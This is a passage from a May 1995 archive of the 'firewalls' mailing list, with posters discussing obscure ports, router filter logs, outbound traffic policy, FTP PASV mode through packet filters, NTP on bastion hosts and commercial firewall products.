Inc); id PAA02817 for firewalls@greatcircle.com; Mon, 15 May 1995 15:03:01 -0400 Message-Id: <199505151903.PAA02817@real.com> To: firewalls@greatcircle.com Subject: Re: Not very well-known ports Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > As I was browsing thru The Firewall Book over the weekend, I noticed > that the authors stated, in at least two places, that they were using > unusual port numbers to move data thru their firewall. > > Now I'm wondering, is this something to be recommended to those of us who > are fairly new to fire-walling, and what are the advantages and > disadvantages of it? > Well, dont count on it for security.. Portscanners can detect that *something* is accepting connections there.. And if it accepts any connection, and it is discovered..... if it is outgoing only, or if it only accepts connections from certain machines (ie with tcp_wrapper type technology, or for just 1 machine, specify it in the accept() call) then it is safer (still, a port bomb may disrupt service for a short while (ie open a bunch of connections to em, and let em eventually time out) From firewalls-owner Mon May 15 14:31:39 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA00132 for firewalls-outgoing; Mon, 15 May 1995 14:02:08 -0700 Received: from software.net (www2.software.net [204.69.144.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA00127 for ; Mon, 15 May 1995 14:02:05 -0700 Received: (jpp@localhost) by software.net (8.6.10/3.2W4) id NAA24968; Mon, 15 May 1995 13:52:08 -0700 Date: Mon, 15 May 1995 13:52:02 +0100 From: John Pettitt Subject: Livingston filter bug? To: Firewalls@GreatCircle.COM Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Im using the livingston "firewall router" as part of my firewall, I have a filter rule that rejects packets from my net that appear on the outside interface, from time to time I see dropped packets in the log that cite this rule. There is no pattern to the destination and they appear to be from my web servers (tcp 80 and 443). As far as I can see there are two explantations. 1) somebody is trying to spoof me 2) the livingston gets it wong from time to time I'm trying to rule out case 2 - has anyboy else seen this happen? John Pettitt jpp@software.net VP Engineering +1 415 473 3065 (V) CyberSource Corporation +1 415 473 3066 (F) From firewalls-owner Mon May 15 15:06:06 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA00124 for firewalls-outgoing; Mon, 15 May 1995 14:01:22 -0700 Received: from software.net (www2.software.net [204.69.144.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA00117 for ; Mon, 15 May 1995 14:01:18 -0700 Received: (jpp@localhost) by software.net (8.6.10/3.2W4) id NAA24968; Mon, 15 May 1995 13:52:08 -0700 Date: Mon, 15 May 1995 13:52:02 +0100 From: John Pettitt Subject: Livingston filter bug? To: Firewalls@GreatCircle.COM Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Im using the livingston "firewall router" as part of my firewall, I have a filter rule that rejects packets from my net that appear on the outside interface, from time to time I see dropped packets in the log that cite this rule. There is no pattern to the destination and they appear to be from my web servers (tcp 80 and 443). As far as I can see there are two explantations. 1) somebody is trying to spoof me 2) the livingston gets it wong from time to time I'm trying to rule out case 2 - has anyboy else seen this happen? John Pettitt jpp@software.net VP Engineering +1 415 473 3065 (V) CyberSource Corporation +1 415 473 3066 (F) From firewalls-owner Mon May 15 15:20:06 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA01772 for firewalls-outgoing; Mon, 15 May 1995 14:50:45 -0700 Received: from gateway.sctc.com (GATEWAY.SCTC.COM [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA01766 for ; Mon, 15 May 1995 14:50:39 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id QAA04777 for ; Mon, 15 May 1995 16:54:05 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 149930000; 15 May 95 17:50 CDT Received: from sctc.com by sccmailhost.sctc.com id 075810000; 15 May 95 17:50 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id QAA29982; Mon, 15 May 1995 16:49:53 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA10500; Mon, 15 May 1995 16:49:51 -0500 Date: Mon, 15 May 1995 16:49:51 -0500 From: Rick Smith Message-Id: <199505152149.QAA10500@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Why control outbound traffic? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Regarding whether there are risks of allowing unrestricted outbound traffic, Bill Bunting summarizes: >1. No. There is not a security problem with allowing unrestricted outgoing >traffic [from a technical perspective]. It all depends on what you mean by "unrestricted" and what you mean by "a technical perspective." In practice, it all comes down to corporate policy. If the internal network contains information that is to be protected from release to the public (i.e. the Internet) then "unrestricted" access is clearly a bad thing. At the very least, a responsible organization will monitor outgoing traffic in some fashion to provide confidence that people comply with information protection policies. Further restrictions reduce the organization's window of vulnerability to more sophisticated technical attacks, as Andrew Molitor pointed out. Rick. smith@sctc.com roseville, minnesota From firewalls-owner Mon May 15 15:34:32 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA01631 for firewalls-outgoing; Mon, 15 May 1995 14:44:33 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA01576 for ; Mon, 15 May 1995 14:44:13 -0700 Received: from csc.com by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950507) id NAA14745; Mon, 15 May 1995 13:18:22 -0700 Received: by csc.com (Smail3.1.29.1 #1) id m0sB6ad-000iF2C; Mon, 15 May 95 16:18 EDT Date: Mon, 15 May 1995 16:18:07 -0400 (EDT) From: Adam Safier To: "' firewalls@greatcircle.com'" Subject: Borderware, NetSP, Eagle, SmartWall Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm in the process of comparing the above firewalls and would like to get input and opinions of the above products. Does anyone have experiance, especially with performance on different platforms, war stories, gotcha's or opinions on the architecture of these products? The network they would be protecting has 15+ gateway sites with a T1 mesh backbone shared by several organizations (therefore insecure from my view point.) All gateway sites must communicate with each other although much of the traffic will be directed to a couple of main sites. Each of the gateway sites will also have a "public access server/subnet". Each gateway site will hide a private statewide WAN/LAN network. Users on the protected networks will want to access the Internet. I estimate 600-900 users in each hidden network. Of course users will also be dialing in and the calls must be authenticated at the firewall. I'm attracted by Raptor's Eagle (www.raptor.com) and V-One's SmartWall (www.v-one.com) because of the authentication and possible encryption between firewall links (Virtual Private Network (VPN)) but I'm concerned about system load and throughput. Raptor's Eagle GUI interface and Turnkey configuration in the basic system sounds real nice. The ability to configure Eagles either from a local console or a central remote console are exciting. A centralized security Help Desk could assist local managers with their configs. SmartWall sounds real flexible. They include the source code - a modified T.I.S. They have VPN's and a bunch of hooks into different secure card systems, including their own. They also support a WWW server inside the protected network - not sure I want to use that feature. The one catch is they don't have a GUI. NetSP seems very flexible, especially since they have a SOCKS module that can redirect traffic to dedicated servers if load sharing becomes necessary. I'm a little uncomfortable because the managers could easily misconfigure or misuse the SOCKS module. (I want to tell my kid he can go swimming in the ocean but I'm afraid to let him get in the water!) Boarderware seems decent considering it's turnkey but I worry about limitations. Their attitude is "we know best". If I want to run Netscapes Server Proxy or some other non-Borderware proxy I can't. Thanks, Adam PS I don't know if I can "publish" my findings here when I get done (bosses have to approve...) but I'll be happy to share what little I know when I know it. From firewalls-owner Mon May 15 16:01:53 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA00936 for firewalls-outgoing; Mon, 15 May 1995 14:36:13 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA00930 for ; Mon, 15 May 1995 14:36:02 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0sB7nV-0000JMC; Mon, 15 May 95 14:35 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA27471; Mon, 15 May 1995 14:35:33 +0800 Date: Mon, 15 May 1995 14:35:33 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505152135.AA27471@brittany.oes.amdahl.com> To: firewalls@GreatCircle.COM, jay@pcc.com Subject: Re: Packet Filtering, and FTP Customizations X-Sun-Charset: US-ASCII content-length: 3790 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Both the FAQ and the C&B Firewalls book mention customizing the FTP > client to use either a restricted port range or to use the PASV command > to reverse the origination site of the data connection. > > Has anyone done this? Is there source code or patches available to do > this anywhere? > > Thanks in advance, > > Jay I've got modified clients for socksified rftp, ncftp170, and Mosaic's copy of HTFTP.c. If you have a newer version of libwww, it has support built in and you won't need my hacked copy. I'll include the README I put with these as well. Get them from charon.amdahl.com via anonymous ftp. Look in pub/patrick/pasv_ftp. Why use PASV? When you live inside a firewall, it's common to find yourself without direct access to the internet. To achieve finer control, some people use programs that live on a gateway machine, and accept tcp packets from one side of the gateway and pass them to the other. One such program is the socks daemon. When this is implemented, life suddenly becomes wonderful...unless! Some systems are set up to not allow any incoming connections. On these systems, ftp, as normally delivered will let you connect through socks (or other proxy daemons), but as soon as you want some data shipped back, either because you try to get a file, or because you do something as innocuous as an ls, the connection hangs for awhile, and then times out!. It's because the remote ftp_d wants to do a connection to you to ship back the data. Here's what normally happens: Your site Remote site (hmmm, I'm going to ask for data) create a data socket bind my address to it. listen on the socket use the port command to tell the remote site what port. ask for the data create a socket bind my address to it. do a connect to the port specified in the port command received from the client accept the connection When the remote site tries to do the incoming connect, it fails if your site doesn't allow incoming data connections. Luckly the creators of ftp planned for this, and created the PASV command. The PASV command to a daemon tells him to go into "passive" mode, i.e. he will listen for our connect on the data connection. His response from the PASV tells us what port to use on his machine to do the connect. Here's how it works: Your site Remote site (hmmm, I'm going to ask for data) create a data socket bind my address to it. Issue the pasv command receive the pasv command create a data socket bind an my address to it listen report back the address of my port Using the address we got back as the response of the PASV, do a connect for the data connection. accept the data connection Ask for the data. _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Mon May 15 17:01:37 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA05999 for firewalls-outgoing; Mon, 15 May 1995 16:43:53 -0700 Received: from cseic.saic.com (CSEIC.SAIC.COM [139.121.32.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA05994 for ; Mon, 15 May 1995 16:43:49 -0700 Received: by cseic.saic.com (4.1/1.34) id AA23186; Mon, 15 May 95 19:42:08 EDT Date: Mon, 15 May 95 19:42:08 EDT From: steveg@cseic.saic.com (Stephen Harold Goldstein) Message-Id: <9505152342.AA23186@cseic.saic.com> To: jpp@software.net Cc: Firewalls@GreatCircle.COM In-Reply-To: John Pettitt's message of Mon, 15 May 1995 13:52:02 +0100 Subject: Livingston filter bug? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk John Pettitt was seeing packets with "inside" source addresses coming in the "outside" interface of his Livingston router, and put forth two scenarios: >> 1) somebody is trying to spoof me >> 2) the livingston gets it wong from time to time May I put forth another: 3) You have another (undocumented?) connection to the outside and packets are somehow being routed out and over the Internet? Anyone care to comment about how probable/possible this scenario is? Stephen Goldstein steveg@cseic.saic.com My first computer: A 24K Atari 800, Rev. A ROMS, November 1980 Disclaimer: That's not what I said. From firewalls-owner Mon May 15 17:23:50 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA06582 for firewalls-outgoing; Mon, 15 May 1995 17:00:31 -0700 Received: from armitage.cyberspace.com (armitage.cyberspace.com [199.2.48.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA06577 for ; Mon, 15 May 1995 17:00:26 -0700 Received: from case (case.cyberspace.com) by armitage.cyberspace.com (4.1/SMI-4.1) id AA09419; Mon, 15 May 95 16:59:35 PDT Date: Mon, 15 May 95 16:59:35 PDT From: billcurr@cyberspace.com (Bill Curr) Message-Id: <9505152359.AA09419@armitage.cyberspace.com> Received: by case (4.1/SMI-4.1) id AA17391; Mon, 15 May 95 17:00:52 PDT Subject: WebServers and Firewalls To: Firewalls@GreatCircle.COM X-Mailer: AIR Mail 3.X (SPRY, Inc.) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Boarderware seems decent considering it's turnkey but I worry about >limitations. Their attitude is "we know best". If I want to run >Netscapes Server Proxy or some other non-Borderware proxy I can't. Excuse my ignorance on firewalls in general, but this leads me to inquire what is the relationship between a firewall and a web server? I have heard suggestions to put a web server "in front" and/or "behind" a firewall. By design, usually web servers are passing out information for every and anybody. I am looking at getting a web server (NetScape Commerce Server) with the idea of having some areas "off-limits" to the general public. It would not need heavy-duty security, more just a password to discourage casual access. But what if we wanted to have high security, say, having folks access an FTP library from our homepages? Thanks-- -bill -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- "Printmaker gone digital" billcurr@cyberspace.com http://www.cyberspace.com/billcurr -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From firewalls-owner Mon May 15 22:01:44 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA10218 for firewalls-outgoing; Mon, 15 May 1995 22:00:20 -0700 Received: from world1.worldbit.com (gw.worldbit.com [199.4.64.236]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA10212 for ; Mon, 15 May 1995 22:00:13 -0700 Received: (blast@localhost) by world1.worldbit.com (8.6.10/A/UX 3.1) id WAA06667; Mon, 15 May 1995 22:09:16 -0700 Date: Mon, 15 May 1995 22:09:15 -0700 (PDT) From: Tim Keanini To: firewalls@greatcircle.com Subject: Re: Packet Filtering, and FTP Customizations (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subject: Re: Packet Filtering, and FTP Customizations On Mon, 15 May 1995, Patrick Horgan wrote: > > > > Both the FAQ and the C&B Firewalls book mention customizing the FTP > > client to use either a restricted port range or to use the PASV command > > to reverse the origination site of the data connection. > > > > Has anyone done this? Is there source code or patches available to do > > this anywhere? [lots deleted] > report back the address of my port > Using the address we got back > as the response of the PASV, > do a connect for the data connection. > accept the data connection You should really consider using 'ncftp'. It is very nice if you are stuck using a command line ftp client from within a packet filtering router. You can just type 'passive' to go into PASV mode or you can have it go into it automatically with a rc file. --blast %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \ Tim Keanini | "The limits of my language, / / aka blast | are the limits of my world." \ \ | --Ludwig Wittgenstein / / | \ \ +================================================/ / for more info on BayMOO... \ \ email baymoo@worldbit.com / %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Mon May 15 23:31:26 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA11234 for firewalls-outgoing; Mon, 15 May 1995 23:15:11 -0700 Received: from uucpB.tokyo.spin.ad.jp (uucpB.tokyo.spin.ad.jp [165.76.8.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA11229 for ; Mon, 15 May 1995 23:15:08 -0700 From: mitubori@tsi.co.jp Received: (uucp@localhost) by uucpB.tokyo.spin.ad.jp (8.6.9+2.4Wb3/3.2W3-uucpB) with UUCP id OAA20674 for Firewalls@GreatCircle.com; Tue, 16 May 1995 14:41:52 +0900 Received: from tsims.tsi.co.jp (mailhost) by tsigw.tsi.co.jp (4.0/6.4J.6-92.1) id AA09016; Tue, 16 May 95 14:11:08 JST Received: from s_kenkyu.tsi.co.jp by tsims.tsi.co.jp (4.2/6.4J.5-92.1) id AA03493; Tue, 16 May 95 13:59:40 JST Received: by s_kenkyu.tsi.co.jp (4.2/6.3Junet-1.0) id AA29379; Tue, 16 May 95 14:11:37 JST Date: Tue, 16 May 95 14:11:37 JST Message-Id: <9505160511.AA29379@s_kenkyu.tsi.co.jp> To: Firewalls@GreatCircle.com Subject: NTP on a bastion system Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, Has anynone knowed and experienced about some tools that relay traffic back and forth between two NTP servers. They must run on a bastion system (FWTK,SunOS4.1.4). Any help will be much appreciated. Thanks in advance. ==================================================================== Hajime Mitsubori Toden Software, Inc Senior Engineer Engineering Reserch & Development Dept. Voice: +81-3-3596-7662 Tepco Minami Kobiki Bldg. Fax: +81-3-3586-7652 8-20-30 Ginza, Chuo-ku, E-mail: mitubori@tsi.co.jp Tokyo 104, Japan ==================================================================== From firewalls-owner Tue May 16 00:01:12 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA11418 for firewalls-outgoing; Mon, 15 May 1995 23:41:52 -0700 Received: from relay.philips.nl (relay.philips.nl [130.144.65.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA11410 for ; Mon, 15 May 1995 23:41:47 -0700 Received: from cnps.lss.cp.philips.com ([130.144.198.1]) by relay.philips.nl (8.6.9/8.6.9-950414) with SMTP id IAA10781; Tue, 16 May 1995 08:40:59 +0200 Received: from kitty.lss.cp.philips.com by cnps.lss.cp.philips.com with smtp (Smail3.1.28.1 #1) id m0sBHPG-0001v1C; Tue, 16 May 95 08:51 MET Received: by kitty.lss.cp.philips.com (Smail3.1.28.1 #1) id m0sBGHo-0001ypC; Tue, 16 May 95 08:39 MET DST Message-Id: From: guido@kitty.lss.cp.philips.com (Guido van Rooij) Subject: Re: Livingston filter bug? To: jpp@software.net (John Pettitt) Date: Tue, 16 May 1995 08:39:20 +0200 (MET DST) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "John Pettitt" at May 15, 95 01:52:02 pm Reply-To: Guido.vanRooij@nl.cis.philips.com (Guido van Rooij) X-Mailer: ELM [version 2.4 PL21] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 524 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk John Pettitt wrote: > > > Hi, Im using the livingston "firewall router" as part of my firewall, > I have a filter rule that rejects packets from my net that appear on > the outside interface, from time to time I see dropped packets in the > log that cite this rule. There is no pattern to the destination > and they appear to be from my web servers (tcp 80 and 443). > You'll have to be more specific. Tell us you network architecture routing tables etc. There are numerous other options than the two below. -Guido From firewalls-owner Tue May 16 02:03:58 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA14955 for firewalls-outgoing; Tue, 16 May 1995 01:43:09 -0700 Received: from relay1.pipex.net (relay1.pipex.net [158.43.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id BAA14943 for ; Tue, 16 May 1995 01:42:51 -0700 Received: from ndl.co.uk (actually ns.ndl.co.uk) by flow.pipex.net with SMTP (PP); Tue, 16 May 1995 09:42:27 +0100 Received: from paladin.ndl.co.uk by ndl.co.uk (4.1/SMI-4.1) id AA01107; Tue, 16 May 95 09:42:21 BST Message-Id: <9505160842.AA01107@ndl.co.uk> X-Sender: martin@mailhost.ndl.co.uk X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 16 May 1995 09:42:22 +0100 To: Firewalls@GreatCircle.COM From: martin@ndl.co.uk (Martin J Norman) Subject: contact info for Internetware Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, can anyone supply me with some contact details for Internetware please. They do the IWare fireware product. thanks, martin --------------------------------------------------------------------- Martin J Norman. Senior Software Engineer Network Designers Ltd. 4 Wharf Mews Cliffe Terrace Wetherby West Yorkshire LS22 6LX England Phone: +44 (0)1937 580101 Fax: +44 (0)1937 580021 From firewalls-owner Tue May 16 03:31:34 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA16261 for firewalls-outgoing; Tue, 16 May 1995 03:23:12 -0700 Received: from icnucevx.cnuce.cnr.it (icnucevx.cnuce.cnr.it [131.114.1.30]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA16256 for ; Tue, 16 May 1995 03:22:47 -0700 Received: from fly.cnuce.cnr.IT by mailsrv.cnuce.cnr.it (PMDF V4.3-13 #6635) id <01HQKK1FAU0W95N7ES@mailsrv.cnuce.cnr.it>; Tue, 16 May 1995 12:22:22 +0100 (MET) Received: by fly.cnuce.cnr.IT (Smail3.1.26.7 #1) id m0sBJmE-00028qC; Tue, 16 May 95 12:22 MET Date: Tue, 16 May 1995 12:22 +0100 (MET) From: claudio@fly.CNUCE.CNR.IT (Claudio Telmon) Subject: Re: Why control outbound traffic? To: firewalls@greatcircle.com Message-id: Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >1. No. There is not a security problem with allowing unrestricted outgoing >traffic [from a technical perspective]. There is a problem with outgoing connections: clients can be bugged as much as servers (maybe more), and connection + bug = security problem. The only differences between inbound and outbound connections IMHO are: - Outbound connection are decided fom the inside. This means that the time and the destination host are decided by the client. This requires a bit of social engineering to let the client connect to the "right" server, or some rerouting, maybe. With WWW this isn't a big broblem: just add a link in the right document. - Outbound connections are usually started without special privileges. This may require some adddictional work to become superuser. - Clients are managed by users :) Am I wrong? - Claudio From firewalls-owner Tue May 16 05:01:22 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA17085 for firewalls-outgoing; Tue, 16 May 1995 04:55:16 -0700 Received: from net.nns.navy.mil (et0.nns.navy.mil [138.169.13.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id EAA17080 for ; Tue, 16 May 1995 04:54:39 -0700 Received: from atis.nns.navy.mil by net.nns.navy.mil (5.65c/1.921207) id AA07021; Tue, 16 May 1995 07:56:00 -0400 Message-Id: Priority: Urgent To: Firewalls Discussion List Mime-Version: 1.0 From: kwb Date: Tue, 16 May 95 07:53:42 -0500 (EDT) Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk please remove from mailing list Kevin W. Bowden SSN688 Planning Yard Systems Administrator Dept. E23B, Bldg 800 12129 Jefferson Ave. Newport News, VA 23602 Voice - 804-688-3498 Fax - 804-688-2225 e-mail - kwb@net.nns.navy.mil From firewalls-owner Tue May 16 05:15:11 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA17008 for firewalls-outgoing; Tue, 16 May 1995 04:37:47 -0700 Received: from moat.cna.org (MOAT.CNA.ORG [192.189.236.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA17003 for ; Tue, 16 May 1995 04:37:45 -0700 Received: by moat.cna.org; id HAA19365; Tue, 16 May 1995 07:39:06 -0400 Received: from ngw.cna.org(192.189.234.8) by moat.cna.org via smap (V1.3) id sma019363; Tue May 16 07:38:49 1995 Received: from cnau-Message_Server by ngw.cna.org with Novell_GroupWise; Tue, 16 May 1995 07:37:29 -0400 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Tue, 16 May 1995 07:36:01 -0400 From: David M Funk To: firewalls@greatcircle.com Subject: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>> Rick Smith 05/15/95 05:49pm >>> >At the very least, a responsible organization will monitor outgoing traffic > in some fashion to provide confidence that people comply with information >protection policies. Our organization has propritary information that is not releasable to the public. This information resides in desks and computers. We do not monitor the briefcases and pockets of employees leaving the building. Are you saying that this is not a responsible organization. I think not From firewalls-owner Tue May 16 06:01:40 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA18071 for firewalls-outgoing; Tue, 16 May 1995 05:54:55 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA18066 for ; Tue, 16 May 1995 05:54:52 -0700 Received: from relay.tis.com by relay3.UU.NET with SMTP id QQypyx10325; Tue, 16 May 1995 08:54:30 -0400 Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0) id sma002530; Tue, 16 May 95 08:51:40 -0400 Received: from (illuminati.tis.com) by tis.com (4.1/SUN-5.64) id AA08724; Tue, 16 May 95 08:53:08 EDT Received: by (4.1/illuminati) id AA03920; Tue, 16 May 95 09:00:36 EDT From: "Marcus J. Ranum" Message-Id: <3920.9505161300@illuminati> Subject: Re: NTP on a bastion system To: mitubori@tsi.co.jp Date: Tue, 16 May 1995 09:00:36 -0400 (EDT) Cc: Firewalls@GreatCircle.com In-Reply-To: <9505160511.AA29379@s_kenkyu.tsi.co.jp> from "mitubori@tsi.co.jp" at May 16, 95 02:11:37 pm Organization: Trusted Information Systems, Inc. Glenwood, MD Phone: 301-854-6889 Coredump: Infocalypse Now!!! Content-Type: text Content-Length: 431 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Has anynone knowed and experienced about some tools that >relay traffic back and forth between two NTP servers. >They must run on a bastion system (FWTK,SunOS4.1.4). Ntpd is pretty good for the job. :) Firewalls make good network clocks, especially if you have more than one of them. Just have the firewall sync with a timesource outside, and have inside systems get clocking from the firewall and spread it internally. mjr. From firewalls-owner Tue May 16 07:01:44 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA18983 for firewalls-outgoing; Tue, 16 May 1995 06:35:48 -0700 Received: from hatteras.ch.inri.com (hatteras.ch.inri.com [198.202.184.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA18974 for ; Tue, 16 May 1995 06:35:43 -0700 Received: from assateague (assateague.ch.inri.com [198.202.184.111]) by hatteras.ch.inri.com (8.6.12/8.6.6) with SMTP id JAA04674; Tue, 16 May 1995 09:36:06 -0400 Date: Tue, 16 May 1995 09:36:06 -0400 Message-Id: <199505161336.JAA04674@hatteras.ch.inri.com> X-Sender: wlb@hatteras.ch.inri.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: claudio@fly.CNUCE.CNR.IT (Claudio Telmon), firewalls@GreatCircle.COM From: wbunting@inri.com (Bill Bunting) Subject: Re: Why control outbound traffic? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Good points. The main reason for original posting was to emphasize numbers 2 and 3 and to point out that each site must make this determination. In the situation you present below, you allow your users to install and use untrusted/untested code (which may happen no matter how hard you try to prevent it). Rick Smith also did a good job of addressing some of the other reasons to control outgoing access such as accounting/auditing and corporate sensitive or classified data. In the end, what policy is chosen depends on the level of risk you are willing to accept. As was pointed out, statement one is incorrect (or at least unclear) without statements two and three. 2. Any risk is from your users. Can you trust your users? Are your users responsible? 3. Cost. Can you afford to allow your users unrestricted external access? [Opinions are mine and may not represent the opinions of my employer... etc...] > >There is a problem with outgoing connections: clients can be bugged as much >as servers (maybe more), and connection + bug = security problem. >The only differences between inbound and outbound connections IMHO are: >- Outbound connection are decided fom the inside. This means that the time >and the destination host are decided by the client. This requires a bit of >social engineering to let the client connect to the "right" server, or some >rerouting, maybe. With WWW this isn't a big broblem: just add a link in the >right document. >- Outbound connections are usually started without special privileges. This >may require some adddictional work to become superuser. >- Clients are managed by users :) > >Am I wrong? > >- Claudio > > From firewalls-owner Tue May 16 07:31:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA19676 for firewalls-outgoing; Tue, 16 May 1995 07:21:39 -0700 Received: from disperse.demon.co.uk (disperse.demon.co.uk [158.152.1.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA19671 for ; Tue, 16 May 1995 07:21:36 -0700 Received: from post.demon.co.uk by disperse.demon.co.uk id aa27421; 16 May 95 14:24 GMT-60:00 Received: from hanover.demon.co.uk by post.demon.co.uk id aa07699; 16 May 95 14:24 GMT-60:00 To: jay@pcc.com Cc: firewalls@greatcircle.com From: benjamin@hanover.demon.co.uk MMDF-Warning: Parse error in original version of preceding line at post.demon.co.uk Date: Tue, 16 May 95 14:13:45 Subject: Re: Packet Filtering, and FTP Customizations Message-ID: <2.51.881397C7B.BenMail@hanover.demon.co.uk> X-Mailer: BenMail 2.51 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I'm trying to use packet filtering on our Cisco 2501 router to > implement some security. I'd like to allow FTP clients to access the > outside world, but will run into the incoming connection problem > described in the FAQ and the C&B Firewalls book. > The trick is to use a PASV type client... If people are using Netscape, they could do their FTP through this, since it does FTP the PASV way.. PASV effectively does what you described as reversing the direction of the connection (that sounds funny) - so you can use normal filtering. -Benjamin -- Windows (n.) - Self propagating virus. Payload: Consumes large amounts of disk space. Stealth: None. Method of Propagation: Hype/Myth From firewalls-owner Tue May 16 08:01:57 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA19406 for firewalls-outgoing; Tue, 16 May 1995 